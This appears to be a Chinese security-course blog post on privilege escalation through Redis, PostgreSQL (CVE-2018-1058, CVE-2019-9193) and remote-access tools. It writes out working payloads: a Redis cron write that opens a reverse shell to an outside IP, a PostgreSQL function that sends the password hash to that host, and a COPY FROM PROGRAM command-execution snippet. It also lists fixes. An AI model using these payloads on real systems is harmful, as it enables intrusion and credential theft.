第100天：权限提升-数据库&Redis&Postgre&第三方软件&TV&向日葵&服务类

Ch4ser

于 2023-06-22 22:55:30 发布

阅读量289

点赞数

分类专栏：权限提升文章标签：数据库 redis java

本文链接：https://blog.csdn.net/qq_46081990/article/details/131222418

版权

权限提升专栏收录该内容

10 篇文章 2 订阅

订阅专栏

文章详细介绍了通过数据库（如Redis和PostgreSQL）以及第三方应用（如Teamviewer、向日葵和Navicat）进行提权的手段，包括利用未授权访问、漏洞、默认口令等方法。同时，讨论了权限获取后的操作及如何修复这些安全隐患。

摘要由CSDN通过智能技术生成

在这里插入图片描述

知识点梳理

#知识点：
1、数据库提权-Redis&PostgreSQL等
2、第三方提权-TV&向日葵&Navicat等

#思考点：
1、如何判断采用什么数据库提权？
2、数据库提权首要条件密码获取？
3、有那些数据库类型可以进行提权？
4、操作系统在数据库提权中有那些疑问？

#章节点：
1、Web权限提升
2、系统权限提升
3、域控权限提升

#详细点：
1、具体有哪些权限需要我们了解掌握的？
后台权限，网站权限，数据库权限，接口权限，系统权限，域控权限等

2、以上常见权限获取方法简要归类说明？
后台权限：SQL注入,数据库备份泄露，默认或弱口令等获取帐号密码进入
网站权限：后台提升至网站权限，RCE或文件操作类、反序列化等漏洞直达Shell
数据库权限：SQL注入,数据库备份泄露，默认或弱口令等进入或网站权限获取后转入
接口权限：SQL注入,数据库备份泄露，源码泄漏，培植不当等或网站权限获取后转入
系统权限：高危系统漏洞直达或网站权限提升转入、数据库权限提升转入，第三方转入等
域控权限：高危系统漏洞直达或内网横向渗透转入，域控其他服务安全转入等

3、以上常见权限获取后能操作的具体事情?
后台权限:
常规WEB界面文章分类等操作，后台功能可操作类
网站权限：
查看或修改程序源代码，可以进行网站或应用的配置文件读取（接口配置信息，数据库配置信息等），还能收集服务器操作系统相关的信息，为后续系统提权做准备。
数据库权限：
操作数据库的权限，数据库的增删改等，源码或配置文件泄漏，也可能是网站权限(webshell)进行的数据库配置文件读取获得。也可以作为提升系统权限手段。
接口权限：
后台或网站权限后的获取途径：后台（修改配置信息功能点），网站权限（查看的配置文件获取），具体可以操作的事情大家自己想想。
系统权限：如同在你自己操作自己的电脑一样
域控权限：如同在你自己操作自己的虚拟机一样

案例演示

数据库-Redis数据库权限提升-计划任务

数据库-PostgreSQL数据库权限提升-漏洞

三方应用-Teamviewer&向日葵&Navivat-凭据

#数据库-Redis数据库权限提升-计划任务
连接(未授权或有密码)-利用如下方法提权
采用未授权直接利用，密码进入需获取配置文件读取
1、设置键值为反弹命令的计划任务写法
2、设置写入目录为/var/spool/cron/
3、设置写入文件名为xiaodi
4、保存执行
set x "\n* * * * * bash -i >& /dev/tcp/47.114.103.63/7788 0>&1\n"
config set dir /var/spool/cron/
config set dbfilename xiaodi
save
参考：https://blog.csdn.net/fly_hps/article/details/80937837
(1).利用计划任务执行命令反弹shell
(2).写ssh-keygen公钥然后使用私钥登陆
(3).权限较低往web物理路径写webshell
修复方案：
注意：以下操作，均需重启 Redis 后才能生效。
绑定需要访问数据库的IP。 将127.0.0.1修改为需要访问此数据库的IP地址。
设置访问密码。在 Redis.conf中requirepass 字段后，设置添加访问密码。
修改Redis服务运行账号。以较低权限账号运行Redis服务，禁用账号的登录权限。

#数据库-PostgreSQL数据库权限提升-漏洞
PostgreSQL是一款关系型数据库。其9.3到11版本中存在一处“特性”，管理员或具有“COPY TO/FROM PROGRAM”权限的用户，可以使用这个特性执行任意命令。
提权利用的是漏洞：CVE-2018-1058 CVE-2019-9193 
连接-利用漏洞-执行-提权
参考：https://vulhub.org/#/environments/postgres/
修复方案：升级版本或打上补丁
-CVE-2018-1058
1、普通用户植入后门命令
CREATE FUNCTION public.array_to_string(anyarray,text) RETURNS TEXT AS $$
    select dblink_connect((select 'hostaddr=47.114.103.63 port=5433 user=postgres password=chybeta sslmode=disable dbname='||(SELECT passwd FROM pg_shadow WHERE usename='postgres'))); 
    SELECT pg_catalog.array_to_string($1,$2);
$$ LANGUAGE SQL VOLATILE;
2、管理员操作数据库触发
docker-compose exec postgres pg_dump -U postgres -f evil.bak vulhub
-CVE-2019-9193
DROP TABLE IF EXISTS cmd_exec;
CREATE TABLE cmd_exec(cmd_output text);
COPY cmd_exec FROM PROGRAM 'id';
SELECT * FROM cmd_exec;

#三方应用-Teamviewer&向日葵&Navivat-凭据
远控类：Teamviewer 向日葵 Todesk VNC Radmin 等
密码类：各大浏览器 Xshell Navicat 3389 等
服务类：FileZilla Serv-u Zend等
演示：
1、用户：Teamviewer 
2、Web用户：向日葵
3、用户：Navicat